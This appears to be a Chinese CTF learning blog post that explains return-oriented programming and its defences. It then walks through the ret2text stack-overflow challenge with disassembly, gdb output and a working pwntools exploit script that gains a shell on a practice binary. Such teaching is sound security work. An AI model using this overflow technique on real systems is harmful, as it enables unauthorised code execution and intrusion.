<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"v4ethan.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="Basic-ROP-Learning ROP(Return-Oriented Programming)概述 ROP(Return-Oriented Programming)是一种高级的代码复用攻击技术，主要用于绕过现代操作系统的安全防护机制（如DEP&#x2F;NX）。其核心思想是在栈缓冲区溢出的基础上，利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值，从而控制程序的执行流程。 1.">
<meta property="og:type" content="article">
<meta property="og:title" content="Basic ROP Learning">
<meta property="og:url" content="https://v4ethan.github.io/2025/04/19/Basic-ROP-Learning/index.html">
<meta property="og:site_name" content="V4Ethan">
<meta property="og:description" content="Basic-ROP-Learning ROP(Return-Oriented Programming)概述 ROP(Return-Oriented Programming)是一种高级的代码复用攻击技术，主要用于绕过现代操作系统的安全防护机制（如DEP&#x2F;NX）。其核心思想是在栈缓冲区溢出的基础上，利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值，从而控制程序的执行流程。 1.">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2025-04-19T05:55:32.000Z">
<meta property="article:modified_time" content="2025-06-27T12:28:39.439Z">
<meta property="article:author" content="V4Ethan">
<meta property="article:tag" content="Pwn">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://v4ethan.github.io/2025/04/19/Basic-ROP-Learning/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>Basic ROP Learning | V4Ethan</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --></head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">V4Ethan</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/index.html" rel="section"><i class="fa fa-user fa-fw"></i>About</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/index.html" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="https://v4ethan.github.io/2025/04/19/Basic-ROP-Learning/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="V4Ethan">
      <meta itemprop="description" content="V4Ethan's Blog">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="V4Ethan">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Basic ROP Learning
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2025-04-19 13:55:32" itemprop="dateCreated datePublished" datetime="2025-04-19T13:55:32+08:00">2025-04-19</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2025-06-27 20:28:39" itemprop="dateModified" datetime="2025-06-27T20:28:39+08:00">2025-06-27</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Pwn/" itemprop="url" rel="index"><span itemprop="name">Pwn</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="Basic-ROP-Learning">Basic-ROP-Learning</h2>
<h2 id="ROP-Return-Oriented-Programming-概述">ROP(Return-Oriented Programming)概述</h2>
<p>ROP(Return-Oriented Programming)是一种高级的<strong>代码复用攻击技术</strong>，主要用于绕过现代操作系统的安全防护机制（如DEP/NX）。其核心思想是在<strong>栈缓冲区溢出的基础上，利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值，从而控制程序的执行流程。</strong></p>
<h3 id="1-基本概念">1. <strong>基本概念</strong></h3>
<h4 id="（1）产生背景">（1）产生背景</h4>
<ul>
<li>
<p><strong>DEP/NX防护</strong>：现代系统禁止执行栈/堆上的代码（数据执行保护）。</p>
</li>
<li>
<p><strong>ASLR防护</strong>：随机化内存布局，增加预测难度。</p>
</li>
<li>
<p><strong>ROP应对方案</strong>：复用已有代码（<code>.text</code>段），避免直接注入shellcode。</p>
</li>
</ul>
<span id="more"></span>
<h4 id="（2）核心原理">（2）核心原理</h4>
<ul>
<li>
<p><strong>Gadget</strong>：以<code>ret</code>指令结尾的短指令序列（如<code>pop eax; ret</code>）。</p>
</li>
<li>
<p><strong>链式调用</strong>：通过精心构造栈帧，使<code>ret</code>指令跳转到下一个gadget，形成&quot;代码链&quot;。</p>
</li>
</ul>
<hr>
<h3 id="2-关键组件">2. <strong>关键组件</strong></h3>
<table>
<thead>
<tr>
<th>组件</th>
<th>作用</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Gadget</strong></td>
<td>程序中原有的短指令序列（通常以<code>ret</code>结尾），实现基本操作（如读写寄存器）。</td>
</tr>
<tr>
<td><strong>ROP Chain</strong></td>
<td>由多个gadget地址和参数组成的栈数据，控制程序执行流。</td>
</tr>
<tr>
<td><strong>Stack Pivot</strong></td>
<td>将栈指针（ESP/RSP）转移到攻击者控制的内存区域（如堆），便于构造链。</td>
</tr>
</tbody>
</table>
<hr>
<h3 id="3-攻击步骤">3. <strong>攻击步骤</strong></h3>
<ol>
<li>
<p><strong>信息泄露</strong></p>
<ul>
<li>获取内存地址（绕过ASLR），如通过格式化字符串漏洞泄露libc基址。</li>
</ul>
</li>
<li>
<p><strong>寻找Gadgets</strong></p>
<ul>
<li>使用工具（如<code>ROPgadget</code>、<code>ropper</code>）扫描二进制文件，收集可用gadgets。</li>
</ul>
</li>
<li>
<p><strong>构造ROP Chain</strong></p>
<ul>
<li>组合gadgets实现目标功能（如调用<code>system(&quot;/bin/sh&quot;)</code>）。</li>
</ul>
</li>
<li>
<p><strong>触发漏洞</strong></p>
<ul>
<li>通过栈溢出等漏洞覆盖返回地址，跳转到第一个gadget。</li>
</ul>
</li>
</ol>
<hr>
<h3 id="4-防御措施">4. <strong>防御措施</strong></h3>
<table>
<thead>
<tr>
<th>防御技术</th>
<th>原理</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>ASLR</strong></td>
<td>随机化内存布局，增加gadget地址预测难度。</td>
</tr>
<tr>
<td><strong>Stack Canary</strong></td>
<td>在栈帧中插入校验值，防止返回地址被覆盖。</td>
</tr>
<tr>
<td><strong>CFI</strong></td>
<td>控制流完整性（Control-Flow Integrity），限制跳转目标仅为合法地址。</td>
</tr>
<tr>
<td><strong>PIC/PIE</strong></td>
<td>位置无关代码，增强ASLR效果。</td>
</tr>
</tbody>
</table>
<h3 id="5-实例-Linux-x86-ROP-Exploit">5.实例 Linux x86 ROP Exploit</h3>
<h5 id="1-ret2text">(1) ret2text</h5>
<ul>
<li>
<h4 id="基本分析"><strong>基本分析</strong></h4>
</li>
</ul>
<p><a target="_blank" rel="noopener" href="https://github.com/ctf-wiki/ctf-challenges/raw/master/pwn/stackoverflow/ret2text/bamboofox-ret2text/ret2text">点击下载: ret2text</a></p>
<p>先看看程序的保护机制</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">~ checksec ret2text</span><br><span class="line">[*] <span class="string">&#x27;/ret2text&#x27;</span></span><br><span class="line">    Arch:       i386-32-little</span><br><span class="line">    RELRO:      Partial RELRO</span><br><span class="line">    Stack:      No canary found</span><br><span class="line">    NX:         NX enabled</span><br><span class="line">    PIE:        No PIE (0x8048000)</span><br><span class="line">    Stripped:   No</span><br><span class="line">    Debuginfo:  Yes</span><br></pre></td></tr></table></figure>
<p>可以看出程序是 32 位程序，且仅开启了栈不可执行保护。接下来我们使用 IDA 反编译该程序：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> __cdecl <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> **argv, <span class="type">const</span> <span class="type">char</span> **envp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="type">char</span> s[<span class="number">100</span>]; <span class="comment">// [esp+1Ch] [ebp-64h] BYREF</span></span><br><span class="line"></span><br><span class="line">  <span class="built_in">setvbuf</span>(stdout, <span class="number">0</span>, <span class="number">2</span>, <span class="number">0</span>);</span><br><span class="line">  <span class="built_in">setvbuf</span>(_bss_start, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;There is something amazing here, do you know anything?&quot;</span>);</span><br><span class="line">  <span class="built_in">gets</span>(s);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;Maybe I will tell you next time !&quot;</span>);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>我们可以看到，程序在<code>main</code>函数使用了很可疑的<code>gets</code>，那程序中就存在栈溢出漏洞，我们回到IDA看反汇编代码</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">.text:<span class="number">0</span>80485FD secure          proc near</span><br><span class="line">.text:<span class="number">0</span>80485FD</span><br><span class="line">.text:<span class="number">0</span>80485FD input           = dword ptr <span class="number">-10</span>h</span><br><span class="line">.text:<span class="number">0</span>80485FD secretcode      = dword ptr <span class="number">-0</span>Ch</span><br><span class="line">.text:<span class="number">0</span>80485FD</span><br><span class="line">.text:<span class="number">0</span>80485FD ; __unwind &#123;</span><br><span class="line">.text:<span class="number">0</span>80485FD                 push    ebp</span><br><span class="line">.text:<span class="number">0</span>80485FE                 mov     ebp, esp</span><br><span class="line">.text:<span class="number">0</span>8048600                 sub     esp, <span class="number">28</span>h</span><br><span class="line">.text:<span class="number">0</span>8048603                 mov     dword ptr [esp], <span class="number">0</span> ; timer</span><br><span class="line">.text:<span class="number">0</span>804860A                 call    _time</span><br><span class="line">.text:<span class="number">0</span>804860F                 mov     [esp], eax      ; seed</span><br><span class="line">.text:<span class="number">0</span>8048612                 call    _srand</span><br><span class="line">.text:<span class="number">0</span>8048617                 call    _rand</span><br><span class="line">.text:<span class="number">0</span>804861C                 mov     [ebp+secretcode], eax</span><br><span class="line">.text:<span class="number">0</span>804861F                 lea     eax, [ebp+input]</span><br><span class="line">.text:<span class="number">0</span>8048622                 mov     [esp<span class="number">+4</span>], eax</span><br><span class="line">.text:<span class="number">0</span>8048626                 mov     dword ptr [esp], offset unk_8048760</span><br><span class="line">.text:<span class="number">0</span>804862D                 call    ___isoc99_scanf</span><br><span class="line">.text:<span class="number">0</span>8048632                 mov     eax, [ebp+input]</span><br><span class="line">.text:<span class="number">0</span>8048635                 cmp     eax, [ebp+secretcode]</span><br><span class="line">.text:<span class="number">0</span>8048638                 jnz     <span class="type">short</span> locret_8048646</span><br><span class="line">.text:<span class="number">0</span>804863A                 mov     dword ptr [esp], offset command ; <span class="string">&quot;/bin/sh&quot;</span></span><br><span class="line">.text:<span class="number">0</span>8048641                 call    _system </span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>在<code>secure</code>函数中我们看到了存在调用<code>system(&quot;/bin/sh&quot;)</code>，那我们的思路就是只能能覆盖到这个地址(即<code>0x0804863A</code>)上就可以拿到shell了，现在再来确定我们能够控制的内存的起始地址距离<code>main</code> 函数的返回地址的字节数。</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">.text:<span class="number">0</span>80486A7                 lea     eax, [esp<span class="number">+80</span>h+s]</span><br><span class="line">.text:<span class="number">0</span>80486AB                 mov     [esp], eax      ; s</span><br><span class="line">.text:<span class="number">0</span>80486AE                 call    _gets</span><br><span class="line">.text:<span class="number">0</span>80486B3                 mov     dword ptr [esp], offset format ; <span class="string">&quot;Maybe I will tell you next time !&quot;</span></span><br><span class="line">.text:<span class="number">0</span>80486BA                 call    _printf</span><br><span class="line">.text:<span class="number">0</span>80486BF                 mov     eax, <span class="number">0</span></span><br><span class="line">.text:<span class="number">0</span>80486C4                 leave</span><br></pre></td></tr></table></figure>
<p>用gef调试看看，现在<code>call _gets</code>的地址处下断点，然后run一下</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">~ <span class="function">gdb ret2text</span></span><br><span class="line"><span class="function">GNU <span class="title">gdb</span> <span class="params">(Ubuntu <span class="number">12.1</span><span class="number">-0u</span>buntu1~<span class="number">22.04</span><span class="number">.2</span>)</span> 12.1</span></span><br><span class="line"><span class="function"><span class="title">Copyright</span> <span class="params">(C)</span> 2022 Free Software Foundation, Inc.</span></span><br><span class="line"><span class="function">gef➤ b *0x080486AE </span></span><br><span class="line"><span class="function">Breakpoint 1 at 0x80486ae: file ret2text.c, line <span class="number">24.</span> </span></span><br><span class="line"><span class="function">gef➤ r </span></span><br><span class="line"><span class="function">There is something amazing here, do you know anything? Breakpoint <span class="number">1</span>, <span class="number">0x080486ae</span> in main () at ret2text.c:<span class="number">24</span></span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function">[ Legend: Modified register | Code | Heap | Stack | String ]</span></span><br><span class="line"><span class="function">─────────────────────────────────────────────────────────────────────────────────────────────── registers ────</span></span><br><span class="line"><span class="function">$eax   : <span class="number">0xffffcf6c</span>  →  <span class="number">0xf7fc66d0</span>  →  <span class="number">0x0000000e</span></span></span><br><span class="line"><span class="function">$ebx   : <span class="number">0xf7fac000</span>  →  <span class="number">0x00229dac</span></span></span><br><span class="line"><span class="function">$ecx   : <span class="number">0xf7fad9b4</span>  →  <span class="number">0x00000000</span></span></span><br><span class="line"><span class="function">$edx   : <span class="number">0x1</span></span></span><br><span class="line"><span class="function">$esp   : <span class="number">0xffffcf50</span>  →  <span class="number">0xffffcf6c</span>  →  <span class="number">0xf7fc66d0</span>  →  <span class="number">0x0000000e</span></span></span><br><span class="line"><span class="function">$ebp   : <span class="number">0xffffcfd8</span>  →  <span class="number">0xf7ffd020</span>  →  <span class="number">0xf7ffda40</span>  →  <span class="number">0x00000000</span></span></span><br><span class="line"><span class="function">$esi   : <span class="number">0xffffd094</span>  →  <span class="number">0xffffd1fc</span>  →  <span class="string">&quot;/home/explorer/CTF-Challenge/Pwn/linux/user-mode/s[...]&quot;</span></span></span><br><span class="line"><span class="function">$edi   : <span class="number">0xf7ffcb80</span>  →  <span class="number">0x00000000</span></span></span><br><span class="line"><span class="function">$eip   : <span class="number">0x080486ae</span>  →  &lt;main<span class="number">+0066</span>&gt; call <span class="number">0x8048460</span> &lt;gets@plt&gt;</span></span><br><span class="line"><span class="function">$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]</span></span><br><span class="line"><span class="function">$cs: <span class="number">0x23</span> $ss: <span class="number">0x2b</span> $ds: <span class="number">0x2b</span> $es: <span class="number">0x2b</span> $fs: <span class="number">0x00</span> $gs: <span class="number">0x63</span></span></span><br></pre></td></tr></table></figure>
<ul>
<li>
<h4 id="栈内存布局分析"><strong>栈内存布局分析</strong></h4>
</li>
</ul>
<p><code>buf</code>地址：<code>0xffffcd5c</code>(因为它是由 <code>eax</code> 和 <code>esp</code> 指向)，<code>ebp</code> 是 <code>0xffffcdc8</code>，而 <code>buf</code> 在 <code>0xffffcd5c</code>，两者距离为：0xffffcdc8 - 0xffffcd5c = 0x6c (108 字节), 因此，输入 108 字节后即可覆盖返回地址。</p>
<ul>
<li>
<h4 id="验证猜想"><strong>验证猜想</strong></h4>
<p>通过我们上面的分析可以构造以下payload:</p>
</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">##!/usr/bin/env python</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">&#x27;./ret2text&#x27;</span>)</span><br><span class="line">target = <span class="number">0x804863a</span></span><br><span class="line">sh.sendline(<span class="string">b&#x27;A&#x27;</span> * <span class="number">108</span> + p32(target))</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>
<p>得到以下输出，想想是哪里出了问题呢？</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">~ python3 exp.py</span><br><span class="line">[+] Starting <span class="built_in">local</span> process <span class="string">&#x27;./ret2text&#x27;</span>: pid 1593</span><br><span class="line">[*] Switching to interactive mode</span><br><span class="line">There is something amazing here, <span class="keyword">do</span> you know anything?</span><br><span class="line">Maybe I will tell you next <span class="keyword">time</span> ![*] Got EOF <span class="keyword">while</span> reading <span class="keyword">in</span> interactive</span><br><span class="line">$ <span class="built_in">ls</span></span><br><span class="line">[*] Process <span class="string">&#x27;./ret2text&#x27;</span> stopped with <span class="built_in">exit</span> code -11 (SIGSEGV) (pid 1593)</span><br><span class="line">[*] Got EOF <span class="keyword">while</span> sending <span class="keyword">in</span> interactive</span><br></pre></td></tr></table></figure>
<p>在此，笔者需要做一个小提示，在某些情况下，寄存器会占用栈空间（后续会专门发文详述），而在32位情况下。我们的<code>ebp</code>占用了4字节，所以正确的偏移地址应该是：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">总偏移 = buf 到 EBP 的距离 (0x6c) + EBP 自身大小 (4) = 0x70 (112)</span><br></pre></td></tr></table></figure>
<p>因此，正确的payload是：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">##!/usr/bin/env python</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">&#x27;./ret2text&#x27;</span>)</span><br><span class="line">target = <span class="number">0x804863a</span></span><br><span class="line"><span class="comment"># sh.sendline(b&#x27;A&#x27; * (108+4) + p32(target))</span></span><br><span class="line">sh.sendline(<span class="string">b&#x27;A&#x27;</span> *(<span class="number">108</span>+<span class="number">4</span>) + p32(target))</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>
<p>输出如下：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">explorer@DESKTOP-JPMNN21:~/CTF-Challenge/Pwn/linux/user-mode/stackoverflow/x86/basic-rop$ python3 exp.py</span><br><span class="line">[+] Starting <span class="built_in">local</span> process <span class="string">&#x27;./ret2text&#x27;</span>: pid 1766</span><br><span class="line">[*] Switching to interactive mode</span><br><span class="line">There is something amazing here, <span class="keyword">do</span> you know anything?</span><br><span class="line">Maybe I will tell you next <span class="keyword">time</span> !$ <span class="built_in">ls</span></span><br><span class="line">exp.py  flag  ret2text</span><br><span class="line">$ <span class="built_in">cat</span> flag</span><br><span class="line">flag&#123;This_is_the_right_payload&#125;</span><br><span class="line">$</span><br><span class="line">[*] Interrupted</span><br><span class="line">[*] Stopped process <span class="string">&#x27;./ret2text&#x27;</span> (pid 1766)</span><br></pre></td></tr></table></figure>
<p>不断更新，敬请期待！</p>
<script src="https://giscus.app/client.js" data-repo="solkatt-cn/solkatt-cn.github.io" data-repo-id="R_kgDONzaTTQ" data-category="Announcements" data-category-id="DIC_kwDONzaTTc4Cpqn7" data-mapping="pathname" data-strict="0" data-reactions-enabled="1" data-emit-metadata="0" data-input-position="top" data-theme="preferred_color_scheme" data-lang="zh-CN" crossorigin="anonymous" async>
</script>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Pwn/" rel="tag"># Pwn</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2025/02/08/%E6%9D%A1%E4%BB%B6%E7%AB%9E%E4%BA%89%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/" rel="prev" title="条件竞争漏洞学习">
      <i class="fa fa-chevron-left"></i> 条件竞争漏洞学习
    </a></div>
      <div class="post-nav-item">
    <a href="/2025/05/10/%E9%80%9A%E8%BF%87C++%E5%AE%9E%E7%8E%B0%E8%AE%A1%E7%AE%97%E7%83%B7%E7%83%83%E5%90%8C%E5%88%86%E5%BC%82%E6%9E%84%E4%BD%93%E6%95%B0%E9%87%8F/" rel="next" title="C++计算烷烃同分异构体数量(一)">
      C++计算烷烃同分异构体数量(一) <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Basic-ROP-Learning"><span class="nav-number">1.</span> <span class="nav-text">Basic-ROP-Learning</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ROP-Return-Oriented-Programming-%E6%A6%82%E8%BF%B0"><span class="nav-number">2.</span> <span class="nav-text">ROP(Return-Oriented Programming)概述</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-%E5%9F%BA%E6%9C%AC%E6%A6%82%E5%BF%B5"><span class="nav-number">2.1.</span> <span class="nav-text">1. 基本概念</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%EF%BC%881%EF%BC%89%E4%BA%A7%E7%94%9F%E8%83%8C%E6%99%AF"><span class="nav-number">2.1.1.</span> <span class="nav-text">（1）产生背景</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%EF%BC%882%EF%BC%89%E6%A0%B8%E5%BF%83%E5%8E%9F%E7%90%86"><span class="nav-number">2.1.2.</span> <span class="nav-text">（2）核心原理</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-%E5%85%B3%E9%94%AE%E7%BB%84%E4%BB%B6"><span class="nav-number">2.2.</span> <span class="nav-text">2. 关键组件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-%E6%94%BB%E5%87%BB%E6%AD%A5%E9%AA%A4"><span class="nav-number">2.3.</span> <span class="nav-text">3. 攻击步骤</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-%E9%98%B2%E5%BE%A1%E6%8E%AA%E6%96%BD"><span class="nav-number">2.4.</span> <span class="nav-text">4. 防御措施</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-%E5%AE%9E%E4%BE%8B-Linux-x86-ROP-Exploit"><span class="nav-number">2.5.</span> <span class="nav-text">5.实例 Linux x86 ROP Exploit</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#1-ret2text"><span class="nav-number">2.5.0.1.</span> <span class="nav-text">(1) ret2text</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%9F%BA%E6%9C%AC%E5%88%86%E6%9E%90"><span class="nav-number">2.5.1.</span> <span class="nav-text">基本分析</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" 